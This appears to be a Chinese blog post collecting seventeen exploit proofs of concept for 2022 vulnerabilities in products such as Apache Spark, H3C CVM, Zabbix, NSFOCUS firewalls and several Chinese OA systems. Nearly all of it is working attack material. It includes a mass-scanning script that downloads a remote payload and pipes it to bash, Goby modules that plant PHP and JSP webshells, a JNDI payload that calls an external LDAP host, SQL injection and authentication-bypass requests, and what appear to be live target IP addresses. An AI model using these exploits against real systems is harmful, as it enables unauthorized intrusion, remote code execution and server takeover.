1、Apache Spark UI 命令注入漏洞 [CVE-2022-33891]
Shodan 搜索:http.favicon.hash:856048515
import requests, ConfigParser, csv, requests, urllib3, timeimport pandas as pdua = 'https://github.com/west-wind/cve-2022-33891'config = ConfigParser.ConfigParser()config.readfp(open(r'POC.conf'))yourHost = config.get('PAYLOAD', 'yourHostHere')yourPayload = config.get('PAYLOAD', 'yourPayloadHere')def usage():print "\nWARNING: This script is inteded to be used for vulnerability testing purposes only. Ensure you're authorised to run your payload on the target prior to using this script!"print "\nExit now, if you are not authorised."print "\nThis POC expects to receive all targets in a CSV file --> allTargets.csv with one column titled --> targets, ex., http://12.23.45.67:9099 or http://spark.domain.com"print "The / will be added by the script."print "\nEnter the payload to be executed on the target in the POC.conf file. "print "Your host in --> yourHostHere 'http://my_domain_here.com'"print "Your payload in --> yourPayloadHere 'payload.sh'\n\n\n"time.sleep(5)def CVE_2022_33891(target):global yourPayload, yourHost, uatry:url = target + '/?doAs=`wget ' + yourHost + '/' + yourPayload + ' && chmod 755 ' + yourPayload + ' | bash`'header = {'User-Agent': ua}response = requests.get(url, headers=header, verify=False)print "\n[+] URL: ",url,"\n[+] HTTP Status: ",response.status_code,"\n[+] HTTP Text: ",response.textexcept Exception as pocEx:print "\n[!] Exception occured: ",pocEx, urlusage()try:df = pd.read_csv('allTargets.csv')column1 = df.targetsfor target in column1:CVE_2022_33891(target)except Exception as mainEx:print "\nException occured in main: ",mainEx
2、Fastjson代码执行漏洞(CVE-2022-25845)
Fastjson <= 1.2.80
{"@type": "java.lang.Exception","@type": "com.github.isafeblue.fastjson.SimpleException","domain": "calc"}
3、H3C CVM 前台任意文件上传漏洞
package exploitsimport ("git.gobies.org/goby/goscanner/goutils""git.gobies.org/goby/goscanner/jsonvul""git.gobies.org/goby/goscanner/scanconfig""git.gobies.org/goby/httpclient""strings")func init() {expJson := `{"Name": "H3C CVM Arbitrary File Upload Vulnerability","Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>","Product": "H3C-CVM","Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/","DisclosureDate": "2022-05-25","Author": "[email protected]","FofaQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")","GobyQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")","Level": "3","Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>","Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>","References": ["https://fofa.so/"],"Is0day": false,"HasExp": true,"ExpParams": [{"name": "fileName","type": "input","value": "evil","show": ""},{"name": "fileContent","type": "input","value": "<%out.println(\"123\");%>","show": ""}],"ExpTips": {"Type": "","Content": ""},"ScanSteps": ["AND",{"Request": {"method": "GET","uri": "/test.php","follow_redirect": true,"header": {},"data_type": "text","data": ""},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "test","bz": ""}]},"SetVariable": []}],"ExploitSteps": ["AND",{"Request": {"method": "GET","uri": "/test.php","follow_redirect": true,"header": {},"data_type": "text","data": ""},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "test","bz": ""}]},"SetVariable": []}],"Tags": ["Arbitrary File Creation"],"VulType": ["Arbitrary File Creation"],"CVEIDs": [""],"CNNVD": [""],"CNVD": [""],"CVSSScore": "8.0","Translation": {"CN": {"Name": "H3C CVM 前台任意文件上传漏洞","Product": "H3C-CVM","Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>","Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>","Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM</span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"> </span>存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>","VulType": ["⽂件上传"],"Tags": ["⽂件上传"]},"EN": {"Name": "H3C CVM Arbitrary File Upload Vulnerability","Product": "H3C-CVM","Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>","Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>","Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>","VulType": ["Arbitrary File Creation"],"Tags": ["Arbitrary File Creation"]}},"AttackSurfaces": {"Application": null,"Support": null,"Service": null,"System": null,"Hardware": null}}`exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {// 上传文件requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222")requestConfig.VerifyTls = falserequestConfig.FollowRedirect = falserequestConfig.Header.Store("Content-range", "bytes 0-10/20")requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")requestConfig.Data = fileContentif resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "\"success\\\":true") {return true}}return false}checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {requestConfig := httpclient.NewGetRequestConfig("/" + fileName)requestConfig.VerifyTls = falserequestConfig.FollowRedirect = falseif resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)}return false}ExpManager.AddExploit(NewExploit(goutils.GetFileName(),expJson,func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {rand := goutils.RandomHexString(6)rand2 := goutils.RandomHexString(6)if exploitUploadFile2398429842(rand2, "<%out.print(\""+rand+"\");%>", u) {return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u)}return false},func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {fileContent := ss.Params["fileContent"].(string)fileName := ss.Params["fileName"].(string)if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {expResult.Success = trueexpResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp"}return expResult},))}// http://183.63.173.141:8080/// https://60.190.202.42:8443/// http://61.53.232.5:28080/
4、H3C企业路由器(ER、ERG2、GR系列)任意用户登录/命令执行
/userLogin.asp/actionpolicy_status/5、Roxy-WI 未经身份验证的远程代码执行
POST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 105Origin: https://192.168.56.114Dnt: 1Referer: https://192.168.56.114/app/login.pySec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closealert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45
6、TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行
package exploitsimport ("git.gobies.org/goby/goscanner/goutils")func init() {expJson := `{"Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution","Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. </p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>","Product": "TRS-MAS","Homepage": "http://www.trs.com.cn/","DisclosureDate": "2022-04-28","Author": "liubye","FofaQuery": "header=\"X-Mas-Server\" || banner=\"X-Mas-Server\"","GobyQuery": "header=\"X-Mas-Server\" || banner=\"X-Mas-Server\"","Level": "3","Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>","Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.<br></p>","References": ["https://cn-sec.com/archives/966820.html"],"Is0day": false,"HasExp": true,"ExpParams": [{"name": "cmdLine","type": "input","value": "whoami","show": ""}],"ExpTips": {"Type": "","Content": ""},"ScanSteps": ["AND",{"Request": {"method": "GET","uri": "/mas/sysinfo/testCommandExecutor.jsp","follow_redirect": true,"header": {},"data_type": "text","data": ""},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "测试命令行进程执行","bz": ""}]},"SetVariable": []}],"ExploitSteps": ["AND",{"Request": {"method": "GET","uri": "/mas/sysinfo/testCommandExecutor.jsp?cmdLine={{{cmdLine}}}&workDir=&pathEnv=&libPathEnv=","follow_redirect": true,"header": {},"data_type": "text","data": ""},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "测试命令行进程执行","bz": ""}]},"SetVariable": []}],"Tags": ["Command Execution"],"VulType": ["Command Execution"],"CVEIDs": [""],"CNNVD": [""],"CNVD": [""],"CVSSScore": "9.7","Translation": {"CN": {"Name": "TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行","Product": "拓尔思-MAS","Description": "<p><span style=\"color: rgb(45, 46, 47); font-size: medium;\">TRS MAS是基于移动互联网时代音视频的使用特点,</span><span style=\"color: rgb(45, 46, 47); font-size: medium;\">北京拓尔思信息技术股份有限公司</span><span style=\"color: rgb(45, 46, 47); font-size: medium;\">推出的一套通用型媒资管理系统,同一个音视频资源能面向不同的终端平台提供使用,有效节省成本,简化操作。</span></p><p><span style=\"color: rgb(45, 46, 47); font-size: medium;\">TRS MAS </span><span style=\"color: rgb(45, 46, 47); font-size: medium;\">v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。</span><br></p>","Recommendation": "<p><span style=\"color: rgb(0, 0, 0); font-size: 18px;\">目前受漏洞影响的版本官方已停止更新,建议使用防御设备进行防护,禁止对 <span style=\"color: rgb(0, 0, 0); font-size: 18px;\">/sysinfo/testCommandExecutor.jsp 路径的访问。</span></span><br></p>","Impact": "<p><span style=\"font-size: medium; color: rgb(45, 46, 47);\">TRS MAS </span><span style=\"font-size: medium; color: rgb(45, 46, 47);\">v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。</span><br></p>","VulType": ["命令执⾏"],"Tags": ["命令执⾏"]},"EN": {"Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution","Product": "TRS-MAS","Description": "<p>TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. </p><p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>","Recommendation": "<p>At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.<br></p>","Impact": "<p>There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.<br></p>","VulType": ["Command Execution"],"Tags": ["Command Execution"]}},"AttackSurfaces": {"Application": null,"Support": null,"Service": null,"System": null,"Hardware": null}}`ExpManager.AddExploit(NewExploit(goutils.GetFileName(),expJson,nil,nil,))}
7、TRS-WAS远程命令执行
/mas/sysinfo/testCommandExecutor.jsp8、WebLogic 反序列化远程命令执行路径探测
/_async/AsyncResponseService9、Zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)
import refrom collections import OrderedDictfrom pocsuite3.lib.utils import random_strfrom pocsuite3.api \import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE, get_listener_ip, get_listener_portfrom pocsuite3.lib.core.interpreter_option \import OptString, OptDict, OptIP, OptPort, OptBool, OptInteger, OptFloat, OptItemsfrom pocsuite3.modules.listener import REVERSE_PAYLOADimport base64import jsonfrom urllib.parse import unquote,quoterequests.packages.urllib3.disable_warnings()class DemoPOC(POCBase):vulID = '0' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0version = '1' # 默认为1author = 'Infiltrator' # PoC作者的大名vulDate = '2022-2-25' # 漏洞公开的时间,不知道就写今天createDate = '2021-8-20' # 编写 PoC 的日期updateDate = '2021-9-12' # PoC 更新的时间,默认和编写时间一样references = [''] # 漏洞地址来源,0day不用写name = 'Zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131)' # PoC 名称appPowerLink = '' # 漏洞厂商主页地址appName = '-' # 漏洞应用名称appVersion = '-' # 漏洞影响版本vulType = VUL_TYPE.COMMAND_EXECUTION # 漏洞类型,类型参考见 漏洞类型规范表category = POC_CATEGORY.EXPLOITS.WEBAPPsamples = [] # 测试样列,就是用 PoC 测试成功的网站install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写desc = '''在启用 SAML SSO 身份验证(非默认)的情况下,未经身份验证的攻击者可以通过修改Cookie数据,绕过身份认证获得对 Zabbix 前端的管理员访问权限。''' # 漏洞简要描述pocDesc = '''poc的用法描述''' # POC用法描述def _options(self):opt = OrderedDict() # value = self.get_option('key')return optdef _verify(self):output = Output(self)# 验证代码s=requests.Session()try:html=s.get(self.url,verify=False)except:output.fail('Could not get Cookie!')return outputtry:set_cookie=base64.b64decode(unquote(html.cookies['zbx_session'])).decode('utf8')except KeyError:output.fail('Could not find zbx_session in Cookies')return outputset_cookie=json.loads(set_cookie)new_cookie=base64.b64encode(json.dumps({"saml_data":{"username_attribute":"Admin"},'sessionid':set_cookie['sessionid'],'sign':set_cookie['sign']}).encode('utf8')).decode('utf8')head={'Cookie':'zbx_session='+new_cookie}res=s.get(self.url+'/index_sso.php',headers=head,verify=False)if 'User settings' and 'Zabbix SIA' in res.text:result={}result["Cookie"]='zbx_session='+new_cookieoutput.success(result)return outputdef _attack(self):_verify()# 注册 DemoPOC 类register_poc(DemoPOC)
10、帆软报表反序列化
webroot/decision/remote/design/channel11、泛微OA-0day管理员任意登录
URL
/mobile/plugin/VerifyQuickLogin.jspPayload
identifier=1&language=1&ipaddress=12、海康威视综合运营管理平台RCE漏洞
URL
/bic/ssoService/v1/applyCTPayload
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.dnstunnel.run","autoCommit":true}}13、用友GRP-U8财务管理软件任意文件上传
/UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=181=1&1=1&1=1&foldername=%2e%2e%2f&filename=14、用友时空KSOA软件前台文件上传漏洞
/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp15、红帆医疗云OA医用版前台SQL注入漏洞
/api/switch-value/list?sorts=%5B%7B%22Field%22:%22convert(int,stuff((select%20quotename(name)%20from%20sys.databases%20for%20xml%20path(%27%27),1,0,%27%27))%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c5c89905a7)16、绿盟下一代防火墙 resourse.php 任意文件上传漏洞
package exploitsimport ("fmt""git.gobies.org/goby/goscanner/goutils""git.gobies.org/goby/goscanner/jsonvul""git.gobies.org/goby/goscanner/scanconfig""git.gobies.org/goby/httpclient""net/url""strings""time")func init() {expJson := `{"Name": "nsfocus resourse.php arbitrary file upload vulnerability","Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>","Product": "nsfocus","Homepage": "https://www.nsfocus.com.cn/","DisclosureDate": "2022-07-18","Author": "LittleBlack","FofaQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"","GobyQuery": "banner=\"PHPSESSID_NF\" || header=\"PHPSESSID_NF\"","Level": "3","Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>","Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>","References": ["https://fofa.so/"],"Is0day": false,"HasExp": true,"ExpParams": [{"name": "cmd","type": "input","value": "system('id');","show": ""}],"ExpTips": {"Type": "","Content": ""},"ScanSteps": ["AND",{"Request": {"method": "GET","uri": "/test.php","follow_redirect": true,"header": {},"data_type": "text","data": ""},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "test","bz": ""}]},"SetVariable": []}],"ExploitSteps": ["AND",{"Request": {"method": "GET","uri": "/test.php","follow_redirect": true,"header": {},"data_type": "text","data": ""},"ResponseTest": {"type": "group","operation": "AND","checks": [{"type": "item","variable": "$code","operation": "==","value": "200","bz": ""},{"type": "item","variable": "$body","operation": "contains","value": "test","bz": ""}]},"SetVariable": []}],"VulType": ["Code Execution"],"Tags": ["Code Execution"],"CVEIDs": [""],"CNNVD": [""],"CNVD": [""],"CVSSScore": "9.5","Translation": {"CN": {"Name": "绿盟下一代防火墙 resourse.php 任意文件上传漏洞","Product": "绿盟下一代防火墙","Description": "<p>绿盟下一代防火墙是一款专用安全防火墙设备。<br></p><p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>","Recommendation": "<p>1、阻拦8081端口访问。2、及时关注官网更新:<a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>","Impact": "<p>绿盟下一代防火墙 bugsInfo/resourse.php 文件存在任意文件上传漏洞,攻击者可上传恶意木马,获取服务器权限。<br></p>","VulType": ["代码执⾏"],"Tags": ["代码执⾏"]},"EN": {"Name": "nsfocus resourse.php 任意文件上传漏洞","Product": "nsfocus","Description": "<p>NSFOCUS Next Generation Firewall is a dedicated security firewall device.<br></p><p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>","Recommendation": "<p>1. Block 8081 port access. 2. Pay attention to the update of the official website in time: <a href=\"https://www.nsfocus.com.cn/\">https://www.nsfocus.com.cn/</a><br></p>","Impact": "<p>There is an arbitrary file upload vulnerability in the NSFOCUS next-generation firewall bugsInfo/resourse.php file. An attacker can upload a malicious Trojan to gain server permissions.<br></p>","VulType": ["Code Execution"],"Tags": ["Code Execution"]}},"AttackSurfaces": {"Application": null,"Support": null,"Service": null,"System": null,"Hardware": null}}`ExpManager.AddExploit(NewExploit(goutils.GetFileName(),expJson,func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {u1 := httpclient.NewFixUrl("https://" + u.IP + ":8081")uri1 := "/api/v1/device/bugsInfo"cfg1 := httpclient.NewPostRequestConfig(uri1)cfg1.VerifyTls = falsecfg1.FollowRedirect = falsecfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {time.Sleep(time.Second * 5)uri2 := "/api/v1/device/bugsInfo"cfg2 := httpclient.NewPostRequestConfig(uri2)cfg2.VerifyTls = falsecfg2.FollowRedirect = falsecfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {u3 := httpclient.NewFixUrl("https://" + u.IP + ":4433")uri3 := "/mail/include/header_main.php"cfg3 := httpclient.NewPostRequestConfig(uri3)cfg3.VerifyTls = falsecfg3.FollowRedirect = falsecfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")cfg3.Data = "1=print+md5%281%29%3B"if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil {return resp3.StatusCode == 200 && strings.Contains(resp3.RawBody, "c4ca4238a0b923820dcc509a6f75849b")}}}return false},func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {cmd := ss.Params["cmd"].(string)u1 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":8081")uri1 := "/api/v1/device/bugsInfo"cfg1 := httpclient.NewPostRequestConfig(uri1)cfg1.VerifyTls = falsecfg1.FollowRedirect = falsecfg1.Header.Store("Content-Type", "multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9")cfg1.Data = "--1d52ba2a11ad8a915eddab1a0e85acd9\r\nContent-Disposition: form-data; name=\"file\"; filename=\"sess_82c13f359d0dd8f51c29d658a9c8ac71\"\r\n\r\nlang|s:52:\"../../../../../../../../../../../../../../../../tmp/\";\r\n--1d52ba2a11ad8a915eddab1a0e85acd9--\r\n"if resp, err := httpclient.DoHttpRequest(u1, cfg1); err == nil && resp.StatusCode == 200 && strings.Contains(resp.RawBody, "upload file success") {time.Sleep(time.Second * 5)uri2 := "/api/v1/device/bugsInfo"cfg2 := httpclient.NewPostRequestConfig(uri2)cfg2.VerifyTls = falsecfg2.FollowRedirect = falsecfg2.Header.Store("Content-Type", "multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef")cfg2.Data = "--4803b59d015026999b45993b1245f0ef\r\nContent-Disposition: form-data; name=\"file\"; filename=\"compose.php\"\r\n\r\n<?php eval($_POST[1]);?>\r\n--4803b59d015026999b45993b1245f0ef--\r\n"if resp2, err2 := httpclient.DoHttpRequest(u1, cfg2); err2 == nil && resp2.StatusCode == 200 && strings.Contains(resp2.RawBody, "upload file success") {u3 := httpclient.NewFixUrl("https://" + expResult.HostInfo.IP + ":4433")uri3 := "/mail/include/header_main.php"cfg3 := httpclient.NewPostRequestConfig(uri3)cfg3.VerifyTls = falsecfg3.FollowRedirect = falsecfg3.Header.Store("Cookie", "PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71")cfg3.Header.Store("Content-Type", "application/x-www-form-urlencoded")cfg3.Data = fmt.Sprintf("1=%s", url.QueryEscape(cmd))if resp3, err := httpclient.DoHttpRequest(u3, cfg3); err == nil && resp3.StatusCode == 200 {expResult.Output = resp3.RawBodyexpResult.Success = true}}}return expResult},))}//https://222.75.146.134:4433
17、通达OA登录认证绕过
URL
/module/retrieve_pwd/header.inc.php?_ZQA_ID=3fb5b8eadff9c793Payload
SESSION%5BLOGIN_THEME%5D=15&_SESSION%5BLOGIN_USER_ID%5D=1&SESSION%5BLOGIN_UD%5D=1- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论